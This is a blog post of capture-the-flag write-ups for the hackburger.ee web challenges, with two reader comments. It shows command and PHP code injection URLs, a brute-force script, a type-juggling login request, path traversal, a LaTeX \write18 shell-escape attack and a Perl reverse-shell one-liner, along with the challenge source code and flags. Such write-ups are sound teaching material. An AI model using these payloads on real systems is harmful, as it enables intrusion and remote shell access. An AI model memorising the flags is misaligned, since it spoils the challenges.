I’ve decided to publish http://hackburger.ee writeups
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| == Warm up | |
| http://burger.laboratorium.ee:8000/?host=%7Ccat+flag.php | |
| Congratulations! | |
| The flag is f1b35744925a3f5946c542a1ee64267af8b93b06 | |
| == File search (30 points) | |
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| from itertools import product | |
| import requests | |
| url = 'http://burger.laboratorium.ee:8004/' | |
| x = map(''.join, product('0123456789abcdef', repeat=2)) | |
| flag = 'c8' | |
| for i in range(0, 39): | |
| for hexa in x: | |
| payload = {'query': flag + str(hexa)} | |
| r = requests.post(url, data=payload) | |
| if 'flag.txt' in r.text: | |
| flag += hexa | |
| payload = {'query': str(flag)} | |
| print flag | |
| c82584c307421228a3c5c5e4dc6a3ea31859975e | |
| == Enter password to get candy (30 points) | |
| POST / HTTP/1.1 | |
| Host: burger.laboratorium.ee:8003 | |
| Content-Length: 32 | |
| Accept: */* | |
| Origin: http://burger.laboratorium.ee:8003 | |
| X-Requested-With: XMLHttpRequest | |
| User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 | |
| Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | |
| Referer: http://burger.laboratorium.ee:8003/ | |
| Accept-Language: es-ES,es;q=0.8 | |
| Cookie: __tawkuuid=e::laboratorium.ee::TOmz6i1BEaKMU8mYuXzP+B0SfD+IhVbLHWkL958QseQJtBq2tG0WZnRmaOHHLny6::2; _ga=GA1.2.1703078470.1500476197 | |
| Connection: close | |
| data=%7B%22password%22%3Atrue%7D | |
| Logged in. Flag is: eae482e1c2d9147891174ecd38bb95a7ee2a9a70 | |
| == Number to ASCII converter (50 points) | |
| http://1.hackme.laboratorium.ee/?number=var_dump(file_get_contents(%22where/is/the/flag/i/am/looking/for/flag.php%22)); | |
| == Magic (120 points) | |
| Please enter 4 flags, separated by underscore (_). | |
| Initially Flag3 was removed (replace with '0') but searching i have found it. | |
| http://6.hackme.laboratorium.ee/03ada8e9692d58a7ff23d3e9317140f8582630d7.txt | |
| Congratulations! | |
| Flag 3 of 4 is: be2933a15bedf986b6e72e6addd3e439693b91fc | |
| Please enter 4 flags, separated by underscore (_). | |
| Flag1 of 4 is: 47b9664515420d44d2c77dc593f7514ccbd17be8 | |
| — on .git | |
| 47b9664515420d44d2c77dc593f7514ccbd17be8 | |
| — on robots.txt | |
| Flag 2 of 4 is: 392d28473a135c2491c227f373d0eed0310e13e3 | |
| — on index.php~ | |
| Flag 4 of 4 is: ebb696a5abb04c8875a0afa29f6dc8d167db67e8 | |
| 47b9664515420d44d2c77dc593f7514ccbd17be8_392d28473a135c2491c227f373d0eed0310e13e3_0_ebb696a5abb04c8875a0afa29f6dc8d167db67e8 | |
| == Underfull hbox (200 points) | |
| Solution was a symlink that www-data moves to output. | |
| www-data -> nginx | |
| hackme8 -> php script | |
| hackme8-jail -> sandboxed | |
| \documentclass{article} | |
| \begin{document} | |
| \immediate\write18{ln -s /home/hackme8/task/index.php sometask.pdf} | |
| … | |
| txt | |
| … | |
| \end{document} | |
| curl -vvv http://burger.laboratorium.ee:8008/output/4ceb1e89ab6841dc731bb3abf402c1245999b9634936b39eafb4532dc43f295e0cbacfdddc9d0fcb/sometask.pdf | |
| * Trying 217.182.73.250… | |
| * Connected to burger.laboratorium.ee (217.182.73.250) port 8008 (#0) | |
| > GET /output/4ceb1e89ab6841dc731bb3abf402c1245999b9634936b39eafb4532dc43f295e0cbacfdddc9d0fcb/sometask.pdf HTTP/1.1 | |
| > Host: burger.laboratorium.ee:8008 | |
| > User-Agent: curl/7.47.0 | |
| > Accept: */* | |
| > | |
| < HTTP/1.1 200 OK | |
| < Server: nginx/1.10.3 | |
| < Date: Sat, 19 Aug 2017 07:10:13 GMT | |
| < Content-Type: application/pdf | |
| < Content-Length: 1405 | |
| < Last-Modified: Tue, 25 Jul 2017 13:04:20 GMT | |
| < Connection: keep-alive | |
| < ETag: "597741d4-57d" | |
| < Accept-Ranges: bytes | |
| < | |
| <html> | |
| <head> | |
| <style> | |
| textarea { | |
| width: 100%; | |
| height: 400px; | |
| } | |
| </style> | |
| </head> | |
| <body> | |
| <h1>LaTeX compiler</h1> | |
| <p> | |
| happy underfull hboxes (badness 10000) | |
| </p> | |
| <h2></h2> | |
| <form action="" method="POST"> | |
| <textarea name="content"></textarea> | |
| <input type="submit" value="Compile LaTeX" /> | |
| </form> | |
| <?php | |
| // You may be interested in the flag. | |
| // The flag is: e1b19a9f1159560c0036d87c4831f9cb26ef7d0c | |
| if ($_POST['content']) { | |
| echo '<h2>Compilation result</h2>'; | |
| function random_token() { | |
| return bin2hex(openssl_random_pseudo_bytes(40)); | |
| } | |
| $folder = random_token(); | |
| mkdir("/tmp/" . $folder); | |
| system("chmod -R 777 /tmp/" . $folder); | |
| $f = fopen("/tmp/" . $folder . "/doc.latex", "w"); | |
| fwrite($f, $_POST['content']); | |
| fclose($f); | |
| system('sudo -u hackme8-jail /home/hackme8-jail/task/compile-latex /tmp/' . $folder); | |
| system("cp -R /tmp/" . $folder ." " . __DIR__ . '/output/'); | |
| echo "<a href='/output/" . $folder . "/doc.pdf'>here's your pdf</a>"; | |
| } | |
| ?> | |
| </body> | |
| </html> | |
| Bonus – shell and OLD solution | |
| \documentclass{article} | |
| \begin{document} | |
| \immediate\write18{perl -e 'use Socket;$i="YOUR";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'} | |
| … | |
| TXT | |
| … | |
| \end{document} | |
| <html> | |
| <head> | |
| <style> | |
| textarea { | |
| width: 100%; | |
| height: 400px; | |
| } | |
| </style> | |
| </head> | |
| <body> | |
| <h1>LaTeX compiler</h1> | |
| <p> | |
| happy underfull hboxes (badness 10000) | |
| </p> | |
| <h2></h2> | |
| <form action="" method="POST"> | |
| <textarea name="content"></textarea> | |
| <input type="submit" value="Compile LaTeX" /> | |
| </form> | |
| <?php | |
| // You may be interested in the flag. | |
| // The flag is: ea39877adf2aabe27c21f03c08caabc27851e18b | |
| if ($_POST['content']) { | |
| echo '<h2>Compilation result</h2>'; | |
| function random_token() { | |
| return bin2hex(openssl_random_pseudo_bytes(40)); | |
| } | |
| $folder = random_token(); | |
| mkdir("/tmp/" . $folder); | |
| system("chmod -R 777 /tmp/" . $folder); | |
| $f = fopen("/tmp/" . $folder . "/doc.latex", "w"); | |
| fwrite($f, $_POST['content']); | |
| fclose($f); | |
| system('sudo -u hackme8-jail /home/hackme/hackme8-jail/compile-latex /tmp/' . $folder); | |
| system("cp -R /tmp/" . $folder ." output/"); | |
| echo "<a href='/output/" . $folder . "/doc.pdf'>here's your pdf</a>"; | |
| } | |
| ?> | |
| </body> | |
| </html> | |
| == Zip file browser (150 points) | |
| ../../../../home/hackme/hackme5/index.php | |
| <?php | |
| $FLAG = '05f5ba70a5bcc14ba4dd2d66147045b3c067400c'; | |
| error_reporting(E_ALL); | |
| ini_set("display_errors", 1); | |
| function rand_key() { | |
| $result = ''; | |
| for($i = 0; $i < 40; $i++) { | |
| $result .= rand() % 10; | |
| } | |
| return $result; | |
| } | |
| if (!empty($_FILES)) { | |
| $zip = $_FILES["zipfile"]["tmp_name"]; | |
| $name = $_POST['filename']; | |
| $tempdir = sys_get_temp_dir() . '/dir_hackme5_' . rand_key(); | |
| mkdir($tempdir); | |
| system("unzip -j ". escapeshellarg($zip) . " -d " . escapeshellarg($tempdir) . " 2>&1 > /dev/null"); | |
| echo '<h2>File contents</h2>'; | |
| if (stripos('/', $name) !== FALSE) { | |
| die("hax0r no!"); | |
| } | |
| echo file_get_contents($tempdir . "/" . $name); | |
| } | |
| ?> | |
| flag: 05f5ba70a5bcc14ba4dd2d66147045b3c067400c | |
| == We tried to clone pastebin (90 points) | |
| <?php | |
| if (isset($_POST['content'])) { | |
| if (strlen($_POST['content']) > 1000) { | |
| die("At most 1000 chars"); | |
| } | |
| $hash = md5(time() . time() . "6548b41279a6a0ecf4d210fdd078a19b63ed08e0" . sha1(time())); | |
| $f = fopen(__DIR__ . "/files/" . $hash, 'w'); | |
| fwrite($f, date("Y-m-d H:i:s") . "\n"); | |
| fwrite($f, $_POST['content']); | |
| fclose($f); | |
| header("Location: /files/" . $hash); | |
| die(); | |
| } | |
| ?> | |
| <html> | |
| <head> | |
| <style> | |
| textarea { | |
| width: 100%; | |
| height: 400px; | |
| } | |
| </style> | |
| </head> | |
| <body> | |
| <h1>A service like pastebin, but worse</h1> | |
| <h2>Add paste</h2> | |
| <form action="" method="POST"> | |
| <textarea name="content"></textarea> | |
| <input type="submit" value="Add" /> | |
| </form> | |
| <h2>Recent pastes</h2> | |
| <pre><?php | |
| $files = scandir(__DIR__ . '/files/'); | |
| $lines = array(); | |
| foreach($files as $hash) { | |
| if ($hash == '.' || $hash == '..') { | |
| continue; | |
| } | |
| $f = fopen(__DIR__ . "/files/" . $hash, 'r'); | |
| $date_line = fgets($f); | |
| fclose($f); | |
| array_push($lines, $date_line); | |
| } | |
| sort($lines); | |
| foreach($lines as $date_line) { | |
| echo $date_line . "\n"; | |
| } | |
| ?></pre> | |
| </body> | |
| </html> | |
| Take $hash = md5(time() . time() . "6548b41279a6a0ecf4d210fdd078a19b63ed08e0" . sha1(time())); | |
| 2017-07-23 19:15:11 | |
| The flag is: c4c1006fbdacbb8fd9cebee71a316bc2fac8620f | |
| http://burger.laboratorium.ee:8007/files/e452096701642327b38f352430b89e97 | |
| <?php $i='1500830111'; | |
| echo md5($i . $i . "6548b41279a6a0ecf4d210fdd078a19b63ed08e0" . sha1($i)); | |
| ?> | |
tunelko
noviembre 30, 2017Hi 123,
I have solved this task when it was buggy and can be solved from other tasks. Site had been with some tasks problems and i haven’t retry to solve it. i guess by the code you can upload a crafted file to reach rce due to system command. Maybe, but i have not try it.
123
noviembre 5, 2017Thanks to release the write-up. Can you explain more about Zip file browser task? I don’t understand that exploit code can be bypassed to «stripos» for LFI..